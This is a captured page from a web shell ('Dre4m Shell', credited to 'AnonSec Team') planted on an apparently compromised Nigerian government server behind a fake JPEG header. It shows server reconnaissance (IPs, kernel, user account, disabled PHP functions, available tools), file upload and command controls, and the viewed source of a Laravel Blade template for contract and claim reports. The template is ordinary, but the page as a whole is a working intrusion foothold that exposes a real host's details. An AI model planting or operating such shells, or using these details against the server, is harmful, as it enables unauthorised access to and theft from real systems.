ÿØÿàJFIFÿáExifMM*ÿÛC  Dre4m Was Here
Dre4m Shell
Server IP : 199.250.214.225  /  Your IP : 3.144.16.71
Web Server : Apache
System : Linux vps64074.inmotionhosting.com 3.10.0-1160.105.1.vz7.214.3 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : nicngo5 ( 1001)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /home/nicngo5/grp.nicn.gov.ng/storage/framework/views/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/nicngo5/grp.nicn.gov.ng/storage/framework/views/4079f1e7c645f2f59b4d56dd59b445cc2ad64782.php
<?php $__env->startSection('pageTitle'); ?>
Contract/Claim Reports
<?php $__env->stopSection(); ?>



<?php $__env->startSection('content'); ?>
       
<div class="box box-default">
  <div class="box-body box-profile">
    <div class="box-header with-border hidden-print">
      <h3 class="box-title"><?php echo $__env->yieldContent('pageTitle'); ?> <span id='processing'></span></h3>
    </div>

    <div class="col-md-12">
                <?php if(count($errors) > 0): ?>
                    <div class="alert alert-danger alert-dismissible" role="alert">
                        <button type="button" class="close" data-dismiss="alert" aria-label="Close">
                            <span aria-hidden="true">&times;</span>
                        </button>
                        <strong>Error!</strong> 
                        <?php $__currentLoopData = $errors->all(); $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $error): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                            <p><?php echo e($error); ?></p>
                        <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                    </div>
                <?php endif; ?>
                <?php if($error != ""): ?>
                    <div class="alert alert-danger alert-dismissible" role="alert">
                        <button type="button" class="close" data-dismiss="alert" aria-label="Close">
                            <span aria-hidden="true">&times;</span>
                        </button>
                        <strong>Error!</strong> 
                            <p><?php echo e($error); ?></p>
                    </div>
                <?php endif; ?>               
                <?php if($success != ""): ?>
                    <div class="alert alert-success alert-dismissible" role="alert">
                        <button type="button" class="close" data-dismiss="alert" aria-label="Close">
                            <span aria-hidden="true">&times;</span>
                        </button>
                        <strong>Success!</strong> <br />
                        <?php echo e($success); ?></div>                        
                <?php endif; ?>
                <?php if(session('err')): ?>
                    <div class="alert alert-danger alert-dismissible" role="alert">
                        <button type="button" class="close" data-dismiss="alert" aria-label="Close">
                            <span aria-hidden="true">&times;</span>
                        </button>
                        <strong>Input Error!</strong> <br />
                        <?php echo e(session('err')); ?></div>                        
                <?php endif; ?>
            </div>


    <div class="box-body">
      <div class="row">
        <div class="col-md-12"><!--1st col--> 
          <?php echo $__env->make('Share.message', \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?>
        
        <form class="form-horizontal" id="form1" role="form" method="post" action="">
        <?php echo e(csrf_field()); ?>


            <div class="col-md-12"><!--2nd col-->
            <!-- /.row -->
            <div class="form-group">
            <div class="col-md-3">          
                    <label class="control-label">Contract Type</label>
                    <select  class="form-control" id="contracttype" onchange="getTable()" name="contracttype" >
                    <option value=""  >-select Contract Type</option>
                    <?php $__currentLoopData = $contractlist; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $list): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                    <option value="<?php echo e($list->ID); ?>" <?php echo e(($contracttype == $list->ID || $list->ID == old('contracttype')) ? "selected":""); ?> ><?php echo e($list->contractType); ?></option>
                    <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>         
                    </select>
                </div>
                

                <div class="col-md-3">
                    <label class="control-label"> Status </label>
                    <select id="status" name="status" onchange="getTable()"  class="form-control" >
                       
                        <option value="All" <?php echo e(($status === 'All' || "All" == old('status')) ? "selected" : ""); ?>>All</option> 
                        <?php $__currentLoopData = $paymemtstatus; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $list): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?> 
                        <option value="<?php echo e($list->code); ?>" <?php echo e(($status == $list->code  || $list->code== old('status')) ? "selected":""); ?>><?php echo e($list->description); ?></option>
                        <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                    </select>
                </div>
                <div class="col-md-2">
                    <label class="control-label"> Approval From </label>
                    <input type="text" class="form-control" id="datepicker1" name="datepicker1" value=<?php echo e($datepicker1); ?> onchange="getTable()" />
                </div>
                <div class="col-md-2">
                    <label class="control-label"> To </label>
                    <input type="text" class="form-control" id="datepicker2" name="datepicker2" value=<?php echo e($datepicker2); ?> onchange="getTable()"/>
                </div>
                <div class="col-md-2">
                    <br>
                   <button type="submit" class="btn btn-success" >Go </button>
                </div>
                

            </div>
            </div>
          <!-- /.col --> 
        </div>
        </form>
        <!-- /.row -->
        <form method="post"  id="form2">
        <div class="row">     
        <?php echo e(csrf_field()); ?>


                <div class="col-md-12"><!--2nd col-->
            <!-- /.row -->
                    <!--<div class="col-md-6"></div>
                    <div class="col-md-6 " >
                        <div class="col-md-0 checkbox pull-right" style="margin:2px;"><label class="text-primary" for="check-all"><input  type="checkbox" class="checkitem" name="check-all" id="check-all">CheckAll</label></div>
                        <div class="col-md-0 pull-right" style="margin:2px;"><span onclick="return reject()" class="btn btn-xs btn-warning">Reject</span></div>
                        <div class="col-md-0 pull-right" style="margin:2px;"><span onclick="return approve()" class="btn btn-xs btn-success">Approve</span></div>
                         <div class="col-md-0 pull-right" style="margin:2px;"><span onclick="return delet()" class="btn btn-sm btn-danger"><i class="fa fa-trash"></i></span></div>                     </div>
                </div>-->
          <!-- /.col --> 
            </div>

        
            <div class="table-responsive col-md-12" >
                <table id="res_tab" class="table table-bordered table-striped table-highlight" >
                    <thead>
                        <tr bgcolor="#c7c7c7">
                            <th>S/N</th>
                            
                            <th>File No</th>
                            <th>Description</th>
                            <th>Amount</th>
                            <th>Balance</th>
                            <th>Beneficiary</th>
                            <th>Created By</th>                            
                            <th>Award/Approved Date</th>
                            <th>Payment Status</th>
                            <th>Action</th>
                            
                        </tr>
                    </thead>
                    <?php $i = 1; ?>
                    <tbody>
                   
                    <?php $__currentLoopData = $tablecontent; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $list): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                        <tr>
                            <td><?php echo e($i++); ?></td>
                            
                            <td><?php echo e($list->fileNo); ?></td>
                            <td><?php echo e($list->ContractDescriptions); ?></td>
                            <td>&#8358; <?php echo e(($list->contractValue ? number_format($list->contractValue, 2) : 0 )); ?></td>
                            <td> &#8358; <?php echo e(($list->contractBalance ? number_format($list->contractBalance, 2) : 0)); ?> </td>
                            <?php if($list->voucherType==2): ?>
                            <td><?php echo e($list->beneficiary); ?></td>
                            <?php else: ?>
                            <td><?php echo e($list->contractor); ?></td>
                            <?php endif; ?>
                            <td><?php echo e($list->createdby); ?></td>
                            
               
                            <td><?php echo e($list->dateAward); ?> </td>
                            
                            <td>
                                <?php if($list->paymentStatus == 0): ?>
                                    <b><span class="text-danger">Pending</span></b>
                                <?php elseif($list->paymentStatus == 2): ?>
                                    <b><span class="text-success">Completed</span></b>
                                <?php else: ?>
                                    <b><span class="text-info">Part Payment</span></b>
                                <?php endif; ?>
                            </td>
                            <td >
                                <a href="/display/comment/<?php echo e($list->ID); ?>" target="_blank" class="btn btn-info">View Details</a>  
                            </td>
                                                         
                        </tr>
                    <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                    </tbody>                    
                </table>
        <br><br><br><br><br>
            </div>
            
          </form>
          <hr />
        </div>
       <br><br><br>
  </div>
</div>



<?php $__env->stopSection(); ?>
<?php $__env->startSection('styles'); ?>
<link rel="stylesheet" type="text/css" href="<?php echo e(asset('assets/css/datepicker.min.css')); ?>">
<?php $__env->stopSection(); ?>

<?php $__env->startSection('styles'); ?>
<style type="text/css">
    .modal-dialog {
width:13cm
}

.modal-header {

background-color: #006600;

color:#FFF;

}

#partStatus{
    width:2.5cm
}

</style>
<?php $__env->stopSection(); ?>

<?php $__env->startSection('scripts'); ?>
<script src="<?php echo e(asset('assets/js/jquery-ui.min.js')); ?>"></script>
<script>
$('#res_tab').DataTable();
    $( function(){
        $("#todayDate").datepicker({changeMonth: true,changeYear: true,dateFormat: 'yy-mm-dd'}); 
      });

    
$( "#datepicker1" ).datepicker({
    dateFormat: "yy-mm-dd",
    onSelect: function(dateText) {
        $('#getCompany').val($('#contractorList').val());
        $('#getStatus').val($('#statusList').val());
        $('#getTime1').val($('#datepicker1').val());
        $('#getTime2').val($('#datepicker2').val());
        $("#SearchContract").submit();
    }

});

$( "#datepicker2" ).datepicker({
    dateFormat: "yy-mm-dd",
    onSelect: function(dateText) {
        $('#getCompany').val($('#contractorList').val());
        $('#getStatus').val($('#statusList').val());
        $('#getTime1').val($('#datepicker1').val());
        $('#getTime2').val($('#datepicker2').val());
        $("#SearchContract").submit();
    }
});

  function getTable()
    {
        
            $('#form1').submit();
        
    } 



 
</script>
<?php $__env->stopSection(); ?>


<?php echo $__env->make('layouts.layout', \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?><?php /**PATH C:\xampp\htdocs\nicngrp\resources\views/Procurements/contractclaim.blade.php ENDPATH**/ ?>

Anon7 - 2022
AnonSec Team